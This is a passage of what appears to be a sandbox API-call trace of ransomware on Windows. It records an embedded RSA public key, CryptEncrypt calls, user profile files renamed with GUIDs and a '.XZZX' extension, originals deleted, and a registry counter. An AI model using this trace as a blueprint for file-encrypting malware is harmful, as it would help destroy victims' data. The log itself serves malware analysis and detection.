lpNumberOfBytesWritten=0x424e438*=0x22f9, lpOverlapped=0x0) returned 1 [0134.193] SetFilePointer (in: hFile=0x708, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x22f9 [0134.193] WriteFile (in: hFile=0x708, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x424e438*=0x5, lpOverlapped=0x0) returned 1 [0134.193] SetFilePointer (in: hFile=0x708, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x22fe [0134.193] WriteFile (in: hFile=0x708, lpBuffer=0x424f860*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x424f860*, lpNumberOfBytesWritten=0x424e438*=0x24, lpOverlapped=0x0) returned 1 [0134.193] SetFilePointer (in: hFile=0x708, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2322 [0134.193] WriteFile (in: hFile=0x708, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x424e438*=0x5, lpOverlapped=0x0) returned 1 [0134.193] SetFilePointer (in: hFile=0x708, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2327 [0134.193] SetErrorMode (uMode=0x1) returned 0x1 [0134.193] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0134.193] OutputDebugStringW (lpOutputString="end") [0134.194] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ$\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x424dbf4, pcbBinary=0x424d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x424dbf4, pcbBinary=0x424d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0134.194] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x424dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x424d3dc, pcbStructInfo=0x424d3d8 | out: pvStructInfo=0x424d3dc, pcbStructInfo=0x424d3d8) returned 1 [0134.194] CryptAcquireContextW (in: phProv=0x424d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x424d3e4*=0x3cf8ad8) returned 1 [0134.194] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf8ad8, dwCertEncodingType=0x1, pInfo=0x3cf1ed0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1f00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1f08*, PublicKey.cUnusedBits=0x0), phKey=0x424d3ec | out: phKey=0x424d3ec*=0x3d11598) returned 1 [0134.194] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0134.195] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0134.195] CryptEncrypt (in: hKey=0x3d11598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x424d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x424d3f0*=0x80) returned 1 [0134.195] CryptEncrypt (in: hKey=0x3d11598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf8b60*, pdwDataLen=0x424d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf8b60*, pdwDataLen=0x424d3e8*=0x80) returned 1 [0134.195] WriteFile (in: hFile=0x708, lpBuffer=0x3cf8b60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8b60*, lpNumberOfBytesWritten=0x424e438*=0x80, lpOverlapped=0x0) returned 1 [0134.195] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0134.195] WriteFile (in: hFile=0x708, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x424e438*=0x5, lpOverlapped=0x0) returned 1 [0134.195] GetUserNameW (in: lpBuffer=0x424e1f8, pcbBuffer=0x424dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x424dfe0) returned 1 [0134.196] wsprintfW (in: param_1=0x424dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0134.196] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x424dfe4 | out: phkResult=0x424dfe4*=0x714) returned 0x0 [0134.196] RegQueryValueExW (in: hKey=0x714, lpValueName="E1010314", lpReserved=0x0, lpType=0x424dfd8, lpData=0x424dfec, lpcbData=0x424dfdc*=0x4 | out: lpType=0x424dfd8*=0x4, lpData=0x424dfec*=0xc3, lpcbData=0x424dfdc*=0x4) returned 0x0 [0134.196] RegCloseKey (hKey=0x714) returned 0x0 [0134.196] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x424dfe8 | out: phkResult=0x424dfe8*=0x714) returned 0x0 [0134.196] RegSetValueExW (in: hKey=0x714, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x424dfec*=0xc4, cbData=0x4 | out: lpData=0x424dfec*=0xc4) returned 0x0 [0134.196] RegCloseKey (hKey=0x714) returned 0x0 [0134.196] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.197] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.197] CloseHandle (hObject=0x708) returned 1 [0134.199] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0134.200] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0134.200] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\v9PzrbehuH3KFc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\v9pzrbehuh3kfc.mp4")) returned 1 [0134.201] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\v9PzrbehuH3KFc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\v9pzrbehuh3kfc.mp4")) returned 0 Thread: id = 460 os_tid = 0xa80 [0134.072] lstrcpyA (in: lpString1=0x469fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.072] lstrcpyW (in: lpString1=0x469f460, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0134.072] lstrcpyW (in: lpString1=0x469e860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.072] SetErrorMode (uMode=0x1) returned 0x1 [0134.072] lstrcpyW (in: lpString1=0x469f860, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0134.072] CoCreateGuid (in: pguid=0x469e440 | out: pguid=0x469e440*(Data1=0x598c60b3, Data2=0xb8e1, Data3=0x45d5, Data4=([0]=0x95, [1]=0xf8, [2]=0x8f, [3]=0xf5, [4]=0x48, [5]=0xa0, [6]=0x9, [7]=0xb2))) returned 0x0 [0134.072] wsprintfW (in: param_1=0x469ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0134.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x469fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0134.073] wsprintfW (in: param_1=0x469e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\99E1A553326E7835598C60B336D85C7D.XZZX") returned 58 [0134.073] StrStrW (lpFirst="NTUSER.DAT", lpSrch="XZZX") returned 0x0 [0134.073] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT", dwFileAttributes=0x20) returned 0 [0134.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 461 os_tid = 0xa84 [0134.166] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.166] lstrcpyW (in: lpString1=0x434f460, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0134.166] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.166] SetErrorMode (uMode=0x1) returned 0x1 [0134.166] lstrcpyW (in: lpString1=0x434f860, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0134.166] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x385e2e55, Data2=0xae63, Data3=0x4a49, Data4=([0]=0x87, [1]=0x51, [2]=0xb1, [3]=0xbd, [4]=0x6b, [5]=0x18, [6]=0xd7, [7]=0x93))) returned 0x0 [0134.166] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0134.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0134.166] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\CFE9B0DF329A583B385E2E5536CF3C83.XZZX") returned 58 [0134.166] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="XZZX") returned 0x0 [0134.166] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG", dwFileAttributes=0x20) returned 0 [0134.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 462 os_tid = 0xa88 [0134.291] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.292] lstrcpyW (in: lpString1=0x420f460, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0134.292] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.292] SetErrorMode (uMode=0x1) returned 0x1 [0134.292] lstrcpyW (in: lpString1=0x420f860, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0134.292] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x85c666d1, Data2=0x3d57, Data3=0x4bde, Data4=([0]=0xb7, [1]=0xf2, [2]=0xb7, [3]=0xf6, [4]=0x19, [5]=0xaa, [6]=0xf7, [7]=0x79))) returned 0x0 [0134.292] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0134.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0134.292] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\BCECBE07122DAE7285C666D1164E92BA.XZZX") returned 58 [0134.292] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="XZZX") returned 0x0 [0134.292] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1", dwFileAttributes=0x20) returned 0 [0134.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 463 os_tid = 0xa8c [0134.451] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.451] lstrcpyW (in: lpString1=0x420f460, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0134.451] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.451] SetErrorMode (uMode=0x1) returned 0x1 [0134.451] lstrcpyW (in: lpString1=0x420f860, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0134.451] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb08e09a6, Data2=0x32ff, Data3=0x47d8, Data4=([0]=0x8b, [1]=0x29, [2]=0xa9, [3]=0x98, [4]=0x2e, [5]=0xf3, [6]=0x72, [7]=0xc5))) returned 0x0 [0134.451] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0134.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0134.451] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\9B5E085A0E4FC028B08E09A61270A470.XZZX") returned 58 [0134.451] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="XZZX") returned 0x0 [0134.451] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2", dwFileAttributes=0x20) returned 0 [0134.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 464 os_tid = 0xa90 [0134.603] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.603] lstrcpyW (in: lpString1=0x420f460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0134.603] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.603] SetErrorMode (uMode=0x1) returned 0x1 [0134.603] lstrcpyW (in: lpString1=0x420f860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0134.603] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x1ebfbc43, Data2=0xa31c, Data3=0x4151, Data4=([0]=0xb4, [1]=0xf3, [2]=0x5, [3]=0x42, [4]=0x84, [5]=0x32, [6]=0xf8, [7]=0xc0))) returned 0x0 [0134.603] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0134.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0134.603] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\71D74054299DB7DC1EBFBC432DBE9C24.XZZX") returned 58 [0134.603] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="XZZX") returned 0x0 [0134.604] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x20) returned 0 [0134.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 465 os_tid = 0xa94 [0134.759] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.759] lstrcpyW (in: lpString1=0x420f460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0134.760] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.760] SetErrorMode (uMode=0x1) returned 0x1 [0134.760] lstrcpyW (in: lpString1=0x420f860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0134.760] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa943f2f2, Data2=0x3505, Data3=0x458d, 